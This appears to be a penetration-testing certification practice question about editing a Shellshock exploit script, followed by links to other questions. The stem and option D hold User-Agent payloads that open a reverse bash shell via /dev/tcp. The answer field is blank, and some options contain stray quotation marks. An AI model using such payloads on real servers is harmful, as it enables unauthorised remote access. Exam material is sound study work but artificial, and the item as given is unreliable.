Multiple Choice
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A) exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B) exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
C) exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
D) exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Correct Answer:
Verified
Correct Answer:
Verified
Q9: Which of the following BEST describes why
Q10: A penetration tester wrote the following script
Q11: Which of the following should a penetration
Q12: A penetration tester discovers that a web
Q13: A penetration tester runs the following command
Q15: A penetration tester has completed an analysis
Q16: A penetration tester obtained the following results
Q17: A penetration tester is preparing to perform
Q18: Given the following output: User-agent:* Disallow: /author/
Q19: Which of the following documents describes specific